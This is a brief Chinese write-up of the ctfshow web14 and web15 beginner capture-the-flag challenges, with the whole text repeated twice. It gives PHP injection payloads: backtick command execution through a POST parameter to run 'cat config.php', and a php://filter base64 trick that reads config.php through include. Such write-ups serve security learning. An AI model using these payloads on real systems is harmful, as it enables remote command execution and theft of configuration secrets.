ctfshow web14 15萌新
用post传参可以绕过过滤
?c=echo `$_POST[a]`?>
再post传参 a=cat config.php
或者php伪协议
?c=include $_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php
再base64解码得到flag
web15 把?>改为: 即可
ctfshow web14 15萌新
用post传参可以绕过过滤
?c=echo `$_POST[a]`?>
再post传参 a=cat config.php
或者php伪协议
?c=include $_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php
再base64解码得到flag
web15 把?>改为: 即可